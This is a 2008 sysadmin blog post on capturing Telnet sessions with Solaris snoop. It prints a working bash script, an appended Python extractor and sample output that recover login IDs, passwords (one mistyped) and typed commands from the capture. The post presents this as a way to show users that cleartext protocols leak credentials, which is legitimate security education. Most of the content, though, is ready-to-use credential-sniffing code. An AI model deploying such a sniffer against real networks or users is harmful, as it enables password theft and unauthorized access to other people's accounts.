Tuesday, April 15, 2008

Capturing Logins And Passwords With Solaris Snoop

Hey There,

Today, we're going to take a look at parsing the output from "snoop" (tested on Solaris 9 and 10; it should also work on Solaris 8) and printing out logins, passwords and simple session information. We'll try to keep the explanation short today, since the examples are long ;)

As a quick note, since we've received more than a few emails on the subject (requesting illegal services we don't provide): Although today's post, and the attached script, will show you how to do something that (under the correct circumstances) could be illegal, unethical or both, we're only presenting it as a tool to help promote security; much like we've done before in posts regarding encrypted passwords, password cracking and so forth. It is not our intention to encourage malicious behaviour; only to bring focus on security-related issues that have been around for a long time and (for some reason) are still treated as minor nuisances.

Hopefully the bash shell script attached at the bottom will be helpful to a few sys admins out there. If you work on a network that allows users to Telnet (or use rsh or any other form of unencrypted network protocol), you may have been on the losing end of an argument about how the stealing of passwords transmitted in cleartext "never really happens."

For those of you afflicted by the aforementioned condition: Good news! You can make it happen (and do it ethically) today. With any luck, the output our script provides from a simple snoop on the Telnet port will make an impression for the positive and convince those users who (for some reason) don't want to use SSH, to finally make the switch :) Note that in order to run the "snoop" command you must be root, or otherwise hold the privilege needed to put the interface into promiscuous mode (on Solaris 10, for example, the net_rawaccess privilege).

Following is the demonstration of a few simple sessions, and the output you can expect to see from the script. You may see quite a bit more since we had to do this in a limited environment and eventually got sick of logging in and out of the server we were snooping on ;) Since some of these examples are extensive, even though we weeded out tons of output, we've included anchor links so you can hop past any particular step rather than having to scroll down through the example output.

1. On the server accepting Telnet connections, we started up this command to capture everything to a snoop binary file (named "output_file"), filtering so that only traffic on port 23 (Telnet) is captured:
Skip to Step 2

host # snoop -o output_file port 23
Using device /dev/qfe (promiscuous mode)
616 ^C
<--- That was the entirety of our snooping process, which is scary in itself.

2. During the time snoop was running on that server, we logged into it multiple times, did a few things, typed our password wrong, logged in again, etc, as seen below (we've clipped a lot of boring warning messages and replaced useless output from our sessions with ellipses (...) - As usual, host names, logins, IP addresses and passwords have been changed to protect the somewhat innocent ;)
Skip to Step 3

host_1 # telnet host
Trying 99.99.99.99...
Connected to host
Escape character is '^]'.
...
SunOS 5.9
...
login: user51
Password:
...
host # ls
file1 file2 file3 file4
file5 file6 file7 file8
host # cd /usr/local
host # pwd
/usr/local
host # exit
logout
...

host_1 # telnet host
Trying 99.99.99.99...
Connected to host
Escape character is '^]'.
...
SunOS 5.9
...
login: user51
Password:
...
host # cat .profile
set -o vi
...
host # exit
logout
...
host_1 # telnet host
Trying 99.99.99.99...
Connected to host
Escape character is '^]'.
...
SunOS 5.9
...
login: user51
Password:
Login incorrect
login: user51
Password:
host # ls
file1 file2 file3 file4
file5 file6 file7 file8
host # w
2:03pm up 17 day(s), 2 users, load average: 0.39, 0.18, 0.12
User tty login@ idle JCPU PCPU what
...
host # whodo
Mon Apr 14 20:30 CDT 2008
...
host # exit
logout
...
host_1 # telnet host
Trying 99.99.99.99...
Connected to host
Escape character is '^]'.
...
SunOS 5.9
...
login: user51
Password:
host # id
uid=55787(user51) gid=666(forx)
host # exit
logout


3. Then we read the binary snoop file back in with "-i" (reading from the file instead of the wire) using snoop's default summary output, saved that to an ascii text file, ran our script (which we named "telpass" to continue our tradition of blatant unoriginality), and watched the logins and passwords come on out:
Skip to Step 4

host # snoop -i output_file >ascii_net_out 2>&1
host # ./telpass ascii_net_out

Possible session info to follow:
........
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
....ls...c.d../u.sr./l.oca.l...pw.d...ex.it...........
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
...c.at....pr.of.il.e...ex.it...........
Possible login ID to follow:
user51
Possible password to follow:
sm@ckM3
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
....ls...w...wh.od.o...ex.it...........
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
...i.d...exi.t...


4. And, finally, we ran snoop in verbose summary mode ("-V", which prints one summary line per protocol layer instead of one per packet, halfway between the default and the full "-v" dump), and pumped that into an ascii text file as well. This provides a little more information on the user's command line usage, but may just be a waste of time since you don't really get anything extra for your effort:
Skip to the summary

host # snoop -V -i output_file >binger
host # ./telpass binger

Possible session info to follow:
........................................
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
......................l....s...................c.........d............../....u.........s....r........./....l.........o....c....a.........l...................p....w.........d...................e....x.........i....t...........................................................
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
...................c.........a....t........................p....r.........o....f.........i....l.........e...................e....x.........i....t...........................................................
Possible login ID to follow:
user51
Possible password to follow:
sm@ckM3
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
......................l....s...................w...................w....h.........o....d.........o...................e....x.........i....t...........................................................
Possible login ID to follow:
user51
Possible password to follow:
User51ab

Possible session info to follow:
...................i.........d...................e....x....i.........t.................


Summary: And that's about that :) You'll notice that at one point we accidentally entered a bad password, but if you're getting this kind of information, you can't complain ;) The script should be fairly simple to decipher. Note that we skip alternate packets while reading the login ID, because the server echoes each typed character back to the client, so every keystroke shows up twice in the capture; the "invisible" password is not echoed, so there every packet is printed. We also skip alternate packets during the sessions (for the same reason) and pad packets that carry no typed character (while we were supposedly thinking of what to do next, or where the next typewriter key was ;) with periods (.). In any event, if you're familiar with Unix or Linux, you can see the commands, directories, etc., from between the dots.

Hope this script helps to keep your work (and maybe even home) network more secure. There's nothing like showing someone their password to convince them that it "does really happen."

Please use responsibly, and best wishes :)


This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.

#!/bin/bash

#
# telpass - extract password and session information from ascii "snoop" output
#
# 2008 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [ $# -ne 1 ]
then
    echo "Usage: $0 snoop_file"
    exit 1
fi

snoop_file="$1"

if [ ! -f "$snoop_file" ]
then
    echo "Snoop Output $snoop_file does not exist. Exiting!"
    exit 1
fi

# login_or_pwd: 0 = reading session traffic, 1 = reading the login ID, 2 = reading the password
# interactive_echo: set after a typed character is printed, so the server's echo of it is skipped
# sess_info: set once the "session info" header has been printed for the current session
login_or_pwd=0
interactive_echo=0
sess_info=0

# IFS= and -r keep leading blanks and backslash sequences (snoop's \r\n) intact in each line
while IFS= read -r line
do
    # the "Last login:" banner means the password was accepted: back to session mode
    if echo "$line" | grep "Last" >/dev/null 2>&1
    then
        echo
        login_or_pwd=0
        continue
    fi
    # the server sent a "login: " prompt
    if echo "$line" | grep "login: *$" >/dev/null 2>&1
    then
        echo
        echo "Possible login ID to follow: "
        login_or_pwd=1
        sess_info=0
        continue
    fi
    # the server sent a "Password:" prompt
    if echo "$line" | grep "Password:" >/dev/null 2>&1
    then
        echo
        echo "Possible password to follow: "
        login_or_pwd=2
        sess_info=0
        continue
    fi
    # login ID: each keystroke is echoed back by the server, so print only every other packet
    if [ "$login_or_pwd" -eq 1 ]
    then
        if [ "$interactive_echo" -eq 1 ]
        then
            interactive_echo=0
            continue
        else
            echo "$line" | awk '{ if ( length($NF) == 1 ) printf "%s", $NF }'
            interactive_echo=1
            continue
        fi
    fi
    # password: not echoed by the server, so print every single-character packet
    if [ "$login_or_pwd" -eq 2 ]
    then
        echo "$line" | awk '{ if ( length($NF) == 1 ) printf "%s", $NF }'
        continue
    fi
    if [ "$login_or_pwd" -eq 0 -a "$sess_info" -eq 0 ]
    then
        echo
        echo "Possible session info to follow:"
        sess_info=1
    fi
    # session traffic: same echo skipping as the login ID, with a "." for every packet
    # that does not carry a single typed character (empty ACKs, server output, etc.)
    if [ "$sess_info" -eq 1 ]
    then
        if [ "$interactive_echo" -eq 1 ]
        then
            interactive_echo=0
            continue
        else
            echo "$line" | awk '{ if ( length($NF) == 1 ) printf "%s", $NF; else printf "." }'
            interactive_echo=1
            continue
        fi
    fi
done <"$snoop_file"
echo
exit 0
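As an added example (this is not part of the original post and not the telpass script above), here is a Python version of the same extraction that keys on the C/R direction flag in snoop's summary lines instead of skipping alternate packets: the server's echo of each keystroke is ignored because it travels in the R direction, not because of its position in the file, and concurrent sessions are kept apart by client port. The sample capture lines are constructed in the shape of snoop's summary output ("src -> dst TELNET C|R port=N data"); the exact column spacing and the "\r\n" rendering of the Enter key are assumptions, not copied from a real capture, and the hostnames, logins and passwords are made up.

```python
import re

# Constructed sample in the shape of snoop's one-line telnet summary output
# ("src -> dst  TELNET C|R port=N data"). Column spacing and the "\r\n" rendering
# of the Enter key are assumptions, not taken from a real capture. Two connections
# are interleaved, and the first one gets its password wrong once, as in the post.
SAMPLE = r"""
host_1 -> host    TELNET C port=33020
host -> host_1    TELNET R port=33020 login: 
host_2 -> host    TELNET C port=33021
host -> host_2    TELNET R port=33021 login: 
host_1 -> host    TELNET C port=33020 user51\r\n
host -> host_1    TELNET R port=33020 user51\r\nPassword: 
host_2 -> host    TELNET C port=33021 oper\r\n
host -> host_2    TELNET R port=33021 oper\r\nPassword: 
host_1 -> host    TELNET C port=33020 sm@ckM3\r\n
host -> host_1    TELNET R port=33020 \r\nLogin incorrect\r\n
host -> host_1    TELNET R port=33020 login: 
host_2 -> host    TELNET C port=33021 Tr0ub4dor\r\n
host -> host_2    TELNET R port=33021 \r\nhost # 
host_1 -> host    TELNET C port=33020 u
host -> host_1    TELNET R port=33020 u
host_1 -> host    TELNET C port=33020 ser51\r\n
host -> host_1    TELNET R port=33020 ser51\r\nPassword: 
host_1 -> host    TELNET C port=33020 User51ab\r\n
host -> host_1    TELNET R port=33020 \r\nhost # 
host_1 -> host    TELNET C port=33020 i
host -> host_1    TELNET R port=33020 i
host_1 -> host    TELNET C port=33020 d\r\n
host -> host_1    TELNET R port=33020 d\r\nuid=55787(user51) gid=666(forx)\r\nhost # 
host_2 -> host    TELNET C port=33021 ls\r\n
host_1 -> host    TELNET C port=33020 exit\r\n
"""

# C = client-to-server, R = server-to-client. Trailing data is optional (pure ACKs).
LINE_RE = re.compile(r'^(\S+) -> (\S+)\s+TELNET ([CR]) port=(\d+)(?: (.*))?$')


def unescape(data):
    """Turn the printable \\r and \\n escapes back into real CR/LF (assumed rendering)."""
    return data.replace('\\r', '\r').replace('\\n', '\n')


class Conn:
    """State for one telnet connection, keyed by the client's source port."""

    def __init__(self, port):
        self.port = port
        self.state = 'session'   # 'login' or 'password' while that prompt is pending
        self.buf = ''            # client text not yet terminated by Enter
        self.current = None      # attempt being assembled
        self.attempts = []       # finished login/password pairs

    def server(self, data):
        """Server text only changes state; echoed keystrokes and output are ignored."""
        text = data.rstrip()
        if text.endswith('login:'):
            self.state, self.buf = 'login', ''
            self.current = {'port': self.port, 'login': '', 'password': '',
                            'ok': True, 'commands': []}
        elif 'Password:' in text:
            self.state, self.buf = 'password', ''
        elif 'Login incorrect' in text and self.attempts:
            self.attempts[-1]['ok'] = False

    def client(self, data):
        """Client text is what was typed; act on each Enter-terminated line."""
        self.buf += unescape(data)
        while '\n' in self.buf:
            line, self.buf = self.buf.split('\n', 1)
            line = line.rstrip('\r')
            if self.state == 'login':
                self.current['login'] = line
                self.state = 'session'          # the Password: prompt switches us again
            elif self.state == 'password':
                self.current['password'] = line
                self.attempts.append(self.current)
                self.state = 'session'
            elif self.current is not None and line:
                self.current['commands'].append(line)


def extract(lines):
    """Parse snoop summary lines; return every login/password pair with its session commands."""
    conns = {}
    for raw in lines:
        m = LINE_RE.match(raw.rstrip('\n'))
        if not m:
            continue                            # not a TELNET summary line
        _src, _dst, direction, port, data = m.groups()
        port = int(port)
        if port not in conns:
            conns[port] = Conn(port)
        (conns[port].client if direction == 'C' else conns[port].server)(data or '')
    return [a for c in conns.values() for a in c.attempts]


if __name__ == '__main__':
    for a in extract(SAMPLE.splitlines()):
        status = 'accepted' if a['ok'] else 'REJECTED'
        print(f"port {a['port']}: {a['login']} / {a['password']} ({status}); "
              f"commands: {' ; '.join(a['commands']) or '-'}")
```

To run it against a real capture, replace SAMPLE with the lines of the file produced by "snoop -i output_file" in default summary mode; the "-V" output has extra per-layer lines that the regex simply skips. The "Login incorrect" check is what lets the output distinguish the mistyped password from the accepted one, which the position-based script above can only leave to the reader.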


, Mike